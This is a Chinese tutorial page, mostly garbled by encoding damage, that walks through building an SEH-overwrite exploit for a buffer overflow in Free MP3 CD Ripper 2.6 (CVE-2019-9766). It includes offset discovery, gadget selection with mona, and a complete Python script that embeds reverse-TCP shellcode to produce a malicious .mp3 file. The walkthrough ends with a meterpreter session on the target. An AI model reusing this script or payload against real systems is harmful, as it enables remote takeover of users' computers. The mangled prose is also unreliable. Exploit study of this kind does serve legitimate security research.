建站
咨詢
售后
建站咨詢
新聞中心
?°??
CVE-2019-9766??3?á?1?óúFree MP3 CD Ripperμ??o3???ò?3????′£??ú×a?????tê±£?Free MP3 CD Ripper 2.6?D?ùóú????μ??o3???ò?3????′?êDíó??§?¨?úμ???3ì1¥?÷??í¨1yì???μ?.mp3???t?′DDè?òa′ú???£±????ê???èê?á??????′μ??é?¤·?·¨£?é?í??£?éμ?±àD′?°2aê?1y3ì?£
è?Dèá??a???′?ê?é£???2???è???URL£ohttps://nvd.nist.gov/vuln/detail/CVE-2019-9766
êμ?é?·?3
- é?í??÷?ú£oKali-Linux-2019.1-vm-amd64
- ??±ê?÷?ú£oCN_Windows7_x86_sp1
- èí?t°?±?£oFree MP3 CD Ripper 2.6
é??°1¤??
- WinDbgx86-v6.12.2.633
- python-2.7.15
- ImmunityDebugger1.85
êμ?é2??è
1. ?é?¤???o3???ò?3????′
(1) í¨1ypythonéú3é×??¨ò?μ?.mp3???t£??aà???10000??×?·?A×a??3é.mp3???t£?′ú??è???£o
(2) ?úKali?D?′DDFmcrExploit.py£?éú3éTestFMCR.mp3???t£?è???í??ùê?£o
(3) ??TestFMCR.mp3?′??μ???±ê?÷?ú£?′ò?aFree MP3 CD Ripper£??ù′ò?aWinDbg£?2¢??WinDbg???óμ???3ìfcrip.exe(Free MP3 CD Ripperμ???3ì)é?£?è???í??ùê?£o
(4) ?úFree MP3 CD Ripper?Dμ??÷“Convert”£????DTestFMCR.mp3??DD×a??£?è???í??ùê?£o
(5) ?úWinDbg?D?′DD?üá?g£??éò??′μ?3ìDò·¢éúá?òì3££?è???í??ùê?£o
(6) ?ù′??′DD?üá?!exchain£?2é?′SEHá′D??¢£?è???í??ùê?£o
?-1yé?ê?áù??2??è£??ò??è·?¨á??o3???ò?3????′μ?′??ú£?2¢?òó?10000??×?·?A3é1|?2??á?SEH?£
2. ±àD′???′à?ó?3ìDò
(1) ?¨??3ìDòμ?ò?3?μ?£??′Dèòa?àéù??×?·?A2??ü1??2??μ?SEH£?ê×?èéú3éò???3¤?è10000?ò??óD???′×?·?μ???±?£??üá?è???£o
- root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -l 10000
?úèYì??à£??aà?????í?ò?2?·?£o
(2) ó?????±?ì???FmcrExploit.py?Dμ?”A”*10000£????′2??è1.2£?éú3éTestFMCR.mp3???t;
(3) ???′2??è1.3?¢1.4?¢1.5oí1.6£?·¢??Pointer to next SEH record±?0×46326846?2??£?è???í??ùê?£o
(4) í¨1y0×46326846?¨??3ìDòμ?ò?3?μ?£??éò??aμà??òaì?3?4116??×?·??í?éò??2??μ? Pointer to next SEH record£???ì?è???£o
(5) ?é?¤2.4?Dμ?μ?μ?ò?3?μ?ê?·??yè·£???FmcrExploit.py?Dμ?buffer?3?μ?a”A”*4116£????′2??è1.2£?éú3éTestFMCR.mp3???t£??????t?′??μ???±ê?÷?ú;
(6) ?ú??±ê?÷?ú?D′ò?aImmunityDebugger1.85£???DDFree MP3 CD Ripper£?convert2??è2.5?Déú3éμ?mp3???t£?μ?μ?è????á1?£o
?éò??′μ?4116??×?·?A?yo??2??μ?á?Pointer to next SEH record£??¨??3é1|?£
(7) Pointer to next SEH record(?ò3?nseh)£???ê???ò???seh?á11μ?????£??aà?ê1ó?”\xeb\x06\x90\x90″ì?3?£??a??×??ú·′??±àμ??á1?ê?jmp 6?¢nop?¢nopèyì???á?£?jmp 6±íê?ì?1y6??×??ú£???o?ì?1yá???nop??á?oíò???4×??úμ?seh′|àí3ìDòμ??·£?è?oó??è?nop??á???£???DD??è?shellcode?£
(8) ±?ày?D?ò??òa?áo?ê1ó?sehó?nseh£?2??ü1?íê3éò?3?1¥?÷μ?è?2?1y3ì£?á÷3ìè???£o
(9) ?°?òpop pop retèyì?á?D???á?ê?ò?????μ??£?úxp?D?a??1y3ì?á?òμ¥oü?à£?μ?ê?win7?°?ü??°?±?μ??μí3?D?óè?á?safeseh?¢ASLRμè°2è?±£?¤′?ê??£°ì·¨×ü±èà§???à£??a??°ì·¨ò2ê?óDμ??£?úImmunityDebugger1.85?′DD?üá?!mona seh£??á1?è???£o
(10) ?üá?!mona sehμ?ê?3??á1??úseh.txt(?????t?úImmunityDebugger1.85μ?°2×°??????)?D£??ú???D?òμ?è???ò?ì?D??¢£o
?éò??′μ??a??pop pop ret??á?DòáD£???ó|μ?ê?èí?t×?′?μ?dll???t(C:\Program Files\Free MP3 CD Ripper\ogg.dll)£?×¢òa2?òaê1ó??μí3×?′?μ?dll???t£??é?ü?áóDASLR?¢SafeSEH±£?¤?£è?oó?ò???í?éò??úFmcrExploit.py?D??SEH?3?μ “\x84\x20\xe4\x66″?£
213?£ocpu?Dμ??·êy?Yμ??3Dòoíí?????′??íμ?μ??·?3Dò?à·′£?′?ê±CPU?Dμ?μ??·êy?Y?a“0x66e42084”£????′í??????íDèòa°′“0x8420e466”à′′??íμ??·êy?Y?£
(11) ?¨??ò???shellcode£??aà??ò????×÷ò???·′?òTCPá??óμ?shellcode£?2ù×÷è???£o
(12) ′ó2.11?D?éò??′3?£?éú3éμ?shellcode?a341×??ú£?Dèòa????ò????o3???μ?′óD?ê?·??ü1?·?è???shellcode?£?ù?YImmunityDebugger1.85μ?μ÷ê??á1?£??ò??à′????ò????o3???μ?′óD?£?μ÷ê??á1?è???(?úèY???à£??ú??ò?2?·?)£o
- 040AFEBC 040AFEE8 èt. Pointer to next SEH record
- 040AFEC0 004955CB ?UI. SE handler
- 040AFEC4 040AFED4 ?t.
- ......
- 040AFEE4 |00492C1A ,I. RETURN to fcrip.00492C1A
- 040AFEE8 |040AFF24 $?. Pointer to next SEH record
- 040AFEEC |00492C24 $,I. SE handler
- ......
- 040AFFC4 |FFFFFFFF ???? End of SEH chain
- 040AFFC8 |7769E0ED íàiw SE handler
- ......
- 040AFFF4 004047F4 ?G@. fcrip.004047F4
- 040AFFF8 01483044 D0H
- 040AFFFC 00000000 ....
0x 040AFFFC -0x 040AFEC4 =0×138£?????3éê?????ê?312£????′?o3???μ?′óD??íê?312+4=316×??ú£???è?316×??ú???′??·?2???341×??úμ?shellcode?£
(13) μ?′??í?T·¨?ìD???è¥á??e?°ì·¨×ü±èà§???à°?£??ò???éò?3¢ê?°?shellcode??DD?1??£?2ù×÷è???£o
?éò??′μ?£??-1y?1????oó£?shellcode±??a283×??ú£??ü1?íêè?·?è??o3???á??£
(14) ??×üò?é?2ù×÷£?±à?-FmcrExploit.py£?′ú??è???£o
- # Stack-based buffer overflow in Free MP3 CD Ripper 2.6
- buffer = "A" * 4116
- NSEH = "\xeb\x06\x90\x90"
- SEH = "\x84\x20\xe4\x66"
- nops = "\x90" * 5
- buf = ""
- buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
- buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
- buf += "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
- buf += "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
- buf += "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
- buf += "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
- buf += "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
- buf += "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
- buf += "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
- buf += "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
- buf += "\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
- buf += "\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x6e\x84"
- buf += "\x68\x02\x00\x22\xb8\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
- buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
- buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
- buf += "\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8"
- buf += "\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00"
- buf += "\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
- buf += "\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"
- pad = "B" * (316 - len(nops) - len(buf) )
- payload = buffer + NSEH + SEH + nops + buf +pad
- try:
- f=open("TestFMCR.mp3","w")
- print "[+] Creating %s bytes mp3 File..." %len(payload)
- f.write(payload)
- f.close()
- print "[+] mp3 File created successfully!"
- except:
- print "File cannot be created!"
3. é?í??£?é2aê?
(1) ?úKaliμ?msfconsole?D???ˉ?ììy??£?μè′y??±ê?÷?úé???£?2ù×÷è???í??ùê?£o
(2) ??×???°?FmcrExploit.pyéú3éμ?TestFMCR.mp3???t??±′μ???±ê?÷?ú£?′ò?aFree MP3 CD Ripper£?Convert??mp3???t£?è?oómeterpreter session3é1|?¨á¢£?è???í??ùê?£o
?á′?£?????Free MP3 CD Ripper 2.6?o3???ò?3????′μ?é?í??£?éμ?±àD′oí2aê??3à?íê3é!?úêμ???D£??é?ü?1Dèòa?áo?é?1¤μ?·?·¨£?ê1mp3???tμ?′???±ê?÷?ú?£
??±à?-í?????
- NSA μ?èí?t???ò1¤3ì?ò?ü Ghidra ??3????′
- ECShop 4.0·′é?DíXSS???′·???
- óòé?í?——DNS????μ???è?
- HTTPS ò22?°2è?£?±?·¢??D????′?á±?????μ?êy?Y
- TP-Link 2???ó|£?°2è?1¤3ìê|1??aá????·óé?÷???′
本文題目:關(guān)于CVE-2019-9766緩沖區(qū)溢出漏洞的滲透模塊編寫與測試
當(dāng)前鏈接:http://www.5511xx.com/article/cdgdhop.html
